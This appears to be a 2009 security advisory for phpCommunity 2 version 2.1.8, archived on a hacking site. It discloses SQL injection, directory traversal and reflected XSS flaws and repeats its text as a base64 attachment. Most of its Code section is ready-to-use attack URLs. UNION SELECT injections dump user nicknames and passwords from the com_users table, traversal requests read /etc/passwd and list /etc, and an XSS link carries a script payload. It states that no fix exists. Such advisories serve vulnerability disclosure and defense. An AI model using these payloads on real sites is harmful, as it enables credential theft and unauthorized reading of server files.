AOH :: HP Unsorted P :: VA2808.HTM

phpCommunity 2 2.1.8 Multiple Vulnerabilities (SQL Injection / Directory Traversal / XSS)



phpCommunity 2 2.1.8 Multiple Vulnerabilities (SQL Injection / Directory Traversal / XSS)
phpCommunity 2 2.1.8 Multiple Vulnerabilities (SQL Injection / Directory Traversal / XSS)



--00504502b07986bf0404648aaf8e
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

*******   Salvatore "drosophila" Fresta   *******

[+] Application: phpCommunity 2
[+] Version: 2.1.8
[+] Website: http://sourceforge.net/projects/phpcommunity2/ 

[+] Bugs: [A] Multiple SQL Injection
          [B] Directory Traversal
          [C] Reflected XSS

[+] Exploitation: Remote
[+] Date: 07 Mar 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com 


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


This web application presents several vulnerabilities
which can be exploited to obtain reserved information.
The following are examples of vulnerabilities
discovered in this application.


- [A] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: module/forum/class_forum.php
                   module/forum/class_search.php

This bug allows a guest to view username and
password of a registered user.


- [B] Directory Traversal

[-] Requisites: none
[-] File affected: module/admin/files/show_file.php,
                   module/admin/files/show_source.php

This bug allows a guest to read arbitrary files and
directory on the web server.


- [C] Reflected XSS

[-] Requisites: none
[-] File affected: templates/1/login.php


*************************************************

[+] Code


- [A] Multiple SQL Injection

http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=1&forum_id=-1' 
UNION ALL SELECT 1,2,CONCAT(nick, 0x3a, pwd),4,5,6,7,8 FROM
com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=2&forum_id=0&topic_id=-1' 
UNION ALL SELECT GROUP_CONCAT(CONCAT(nick, 0x3a, pwd)) FROM
com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=search&s=id&wert=-1%25" 
UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=search&s=nick&wert=-1%25" 
UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25" 
UNION ALL SELECT 1,2,3,4,CONCAT(nick, 0x3a, pwd),6 FROM com_users%23


- [B] Directory Traversal

http://www.site.com/path/module/admin/files/show_file.php?file=../../../../../../../../etc/passwd 

http://www.site.com/path/module/admin/files/show_source.php?path=/etc 


- [C] Reflected XSS

http://www.site.com/path/templates/1/login.php?msg= 


*************************************************

[+] Fix

No fix.


*************************************************

-- 
Salvatore "drosophila" Fresta
CWNP444351

--00504502b07986bf0404648aaf8e
Content-Type: text/plain; charset=US-ASCII; 
	name="phpCommunity 2 2.1.8 Multiple Vulnerabilities-07032009.txt"
Content-Disposition: attachment; 
	filename="phpCommunity 2 2.1.8 Multiple Vulnerabilities-07032009.txt"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_fs0kfuhp0

KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw
cGxpY2F0aW9uOiBwaHBDb21tdW5pdHkgMgpbK10gVmVyc2lvbjogMi4xLjgKWytdIFdlYnNpdGU6
IGh0dHA6Ly9zb3VyY2Vmb3JnZS5uZXQvcHJvamVjdHMvcGhwY29tbXVuaXR5Mi8KClsrXSBCdWdz
OiBbQV0gTXVsdGlwbGUgU1FMIEluamVjdGlvbgogICAgICAgICAgW0JdIERpcmVjdG9yeSBUcmF2
ZXJzYWwKICAgICAgICAgIFtDXSBSZWZsZWN0ZWQgWFNTCgpbK10gRXhwbG9pdGF0aW9uOiBSZW1v
dGUKWytdIERhdGU6IDA3IE1hciAyMDA5CgpbK10gRGlzY292ZXJlZCBieTogU2FsdmF0b3JlICJk
cm9zb3BoaWxhIiBGcmVzdGEKWytdIEF1dGhvcjogU2FsdmF0b3JlICJkcm9zb3BoaWxhIiBGcmVz
dGEKWytdIENvbnRhY3Q6IGUtbWFpbDogZHJvc29waGlsYXh4eEBnbWFpbC5jb20KCgoqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgpbK10gTWVudQoKMSkg
QnVncwoyKSBDb2RlCjMpIEZpeAoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioKClsrXSBCdWdzCgoKVGhpcyB3ZWIgYXBwbGljYXRpb24gcHJlc2VudHMg
c2V2ZXJhbCB2dWxuZXJhYmlsaXRpZXMKd2hpY2ggY2FuIGJlIGV4cGxvaXRlZCB0byBvYnRhaW4g
cmVzZXJ2ZWQgaW5mb3JtYXRpb24uClRoZSBmb2xsb3dpbmcgYXJlIGV4YW1wbGVzIG9mIHZ1bG5l
cmFiaWxpdGllcyAKZGlzY292ZXJlZCBpbiB0aGlzIGFwcGxpY2F0aW9uLgoKCi0gW0FdIE11bHRp
cGxlIFNRTCBJbmplY3Rpb24KClstXSBSZXF1aXNpdGVzOiBtYWdpY19xdW90ZXNfZ3BjID0gb2Zm
ClstXSBGaWxlIGFmZmVjdGVkOiBtb2R1bGUvZm9ydW0vY2xhc3NfZm9ydW0ucGhwCiAgICAgICAg
ICAgICAgICAgICBtb2R1bGUvZm9ydW0vY2xhc3Nfc2VhcmNoLnBocAoKVGhpcyBidWcgYWxsb3dz
IGEgZ3Vlc3QgdG8gdmlldyB1c2VybmFtZSBhbmQKcGFzc3dvcmQgb2YgYSByZWdpc3RlcmVkIHVz
ZXIuCgoKLSBbQl0gRGlyZWN0b3J5IFRyYXZlcnNhbAoKWy1dIFJlcXVpc2l0ZXM6IG5vbmUKWy1d
IEZpbGUgYWZmZWN0ZWQ6IG1vZHVsZS9hZG1pbi9maWxlcy9zaG93X2ZpbGUucGhwLAogICAgICAg
ICAgICAgICAgICAgbW9kdWxlL2FkbWluL2ZpbGVzL3Nob3dfc291cmNlLnBocAoKVGhpcyBidWcg
YWxsb3dzIGEgZ3Vlc3QgdG8gcmVhZCBhcmJpdHJhcnkgZmlsZXMgYW5kIApkaXJlY3Rvcnkgb24g
dGhlIHdlYiBzZXJ2ZXIuCgoKLSBbQ10gUmVmbGVjdGVkIFhTUwoKWy1dIFJlcXVpc2l0ZXM6IG5v
bmUKWy1dIEZpbGUgYWZmZWN0ZWQ6IHRlbXBsYXRlcy8xL2xvZ2luLnBocAoKCioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioKClsrXSBDb2RlCgoKLSBbQV0g
TXVsdGlwbGUgU1FMIEluamVjdGlvbgoKaHR0cDovL3d3dy5zaXRlLmNvbS9wYXRoL2luZGV4LnBo
cD9uPWd1ZXN0JmM9MCZtPWZvcnVtJnM9MSZmb3J1bV9pZD0tMScgVU5JT04gQUxMIFNFTEVDVCAx
LDIsQ09OQ0FUKG5pY2ssIDB4M2EsIHB3ZCksNCw1LDYsNyw4IEZST00gY29tX3VzZXJzJTIzCgpo
dHRwOi8vd3d3LnNpdGUuY29tL3BhdGgvaW5kZXgucGhwP249Z3Vlc3QmYz0wJm09Zm9ydW0mcz0y
JmZvcnVtX2lkPTAmdG9waWNfaWQ9LTEnIFVOSU9OIEFMTCBTRUxFQ1QgR1JPVVBfQ09OQ0FUKENP
TkNBVChuaWNrLCAweDNhLCBwd2QpKSBGUk9NIGNvbV91c2VycyUyMwoKaHR0cDovL3d3dy5zaXRl
LmNvbS9wYXRoL2luZGV4LnBocD9uPWd1ZXN0JmM9MCZtPXNlYXJjaCZzPWlkJndlcnQ9LTElMjUi
IFVOSU9OIEFMTCBTRUxFQ1QgQ09OQ0FUKG5pY2ssIDB4M2EsIHB3ZCksMiBGUk9NIGNvbV91c2Vy
cyUyMwoKaHR0cDovL3d3dy5zaXRlLmNvbS9wYXRoL2luZGV4LnBocD9uPWd1ZXN0JmM9MCZtPXNl
YXJjaCZzPW5pY2smd2VydD0tMSUyNSIgVU5JT04gQUxMIFNFTEVDVCBDT05DQVQobmljaywgMHgz
YSwgcHdkKSwyIEZST00gY29tX3VzZXJzJTIzCgpodHRwOi8vd3d3LnNpdGUuY29tL3BhdGgvaW5k
ZXgucGhwP249Z3Vlc3QmYz0wJm09c2VhcmNoJnM9Zm9ydW0md2VydD0tMSUyNSIgVU5JT04gQUxM
IFNFTEVDVCAxLDIsMyw0LENPTkNBVChuaWNrLCAweDNhLCBwd2QpLDYgRlJPTSBjb21fdXNlcnMl
MjMKCgotIFtCXSBEaXJlY3RvcnkgVHJhdmVyc2FsCgpodHRwOi8vd3d3LnNpdGUuY29tL3BhdGgv
bW9kdWxlL2FkbWluL2ZpbGVzL3Nob3dfZmlsZS5waHA/ZmlsZT0uLi8uLi8uLi8uLi8uLi8uLi8u
Li8uLi9ldGMvcGFzc3dkCgpodHRwOi8vd3d3LnNpdGUuY29tL3BhdGgvbW9kdWxlL2FkbWluL2Zp
bGVzL3Nob3dfc291cmNlLnBocD9wYXRoPS9ldGMKCgotIFtDXSBSZWZsZWN0ZWQgWFNTCgpodHRw
Oi8vd3d3LnNpdGUuY29tL3BhdGgvdGVtcGxhdGVzLzEvbG9naW4ucGhwP21zZz08c2NyaXB0PmFs
ZXJ0KCdYU1MnKTs8L3NjcmlwdD4KCgoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqCgpbK10gRml4CgpObyBmaXguCgoKKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKg=--00504502b07986bf0404648aaf8e--

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.